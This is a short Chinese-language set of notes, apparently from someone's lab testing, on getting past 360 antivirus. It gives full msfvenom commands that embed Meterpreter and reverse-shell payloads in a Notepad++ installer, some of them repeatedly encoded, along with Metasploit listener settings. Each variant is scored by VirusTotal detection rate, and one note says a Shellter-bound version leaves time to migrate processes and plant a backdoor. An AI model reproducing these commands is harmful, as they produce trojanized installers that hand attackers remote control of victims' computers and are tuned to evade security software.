测试杀软:360 全家桶

# MSF

msfconsole

  • mp_npp:(2022/4/16)

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.158.139 LPORT=4444 -x npp.8.1.4.Installer.exe -f exe > mp_npp.exe
      <br>
    • 监听
      • use exploit/multi/handler
      • set payload windows/meterpreter/reverse_tcp
      • set LHOST 192.168.158.139
      • set LPORT 4444
      • run
    • 免杀效果:
      • 不能完全通过 静态扫描,快速扫描没事,指定文件夹扫描木马会报毒,且运行时会第一时间检测出木马
      • virustotal 的检测情况(40 / 70):检测报告
  • mp_rc4_npp_i15:(2022/4/18)

    • msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=192.168.158.139 LPORT=4444 -e x86/shikata_ga_nai -x npp.8.1.4.Installer.exe -i 15 -f exe > mp_rc4_npp_i15.exe
      <br>
    • 监听
      • use exploit/multi/handler
      • set payload windows/meterpreter/reverse_tcp_rc4
      • set LHOST 192.168.158.139
      • set LPORT 4444
      • run
    • 免杀效果:
      • 能过 360 静态检测,但会被 动态检测 查杀
      • virustotal 的检测情况(38 / 70):检测报告
  • sh_npp_i27:(2022/4/18)

    • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.158.139 LPORT=4444 -e x86/shikata_ga_nai -x npp.8.1.4.Installer.exe -i 27 -f exe > sh_npp_i27.exe
      <br>
    • 监听
      • use exploit/multi/handler
      • set payload windows/shell_reverse_tcp_rc4
      • set LHOST 192.168.158.139
      • set LPORT 4444
      • run
    • 免杀效果:
      • 能过 360 静态检测,但会被 动态检测 查杀
      • virustotal 的检测情况(35 / 69):检测报告

# shellter 捆绑免杀

  • shellter_npp:(2022/4/16)
    • payload 选择 shellter 自带的:Meterpreter_Reverse_TCP (选项 1)
    • 免杀效果:
      • 能过 360 静态检测动态检测 报毒会有 大约一分钟 的延迟(时间上足够迁移进程 + 布置后门
      • virustotal 的检测情况(31 / 70检测报告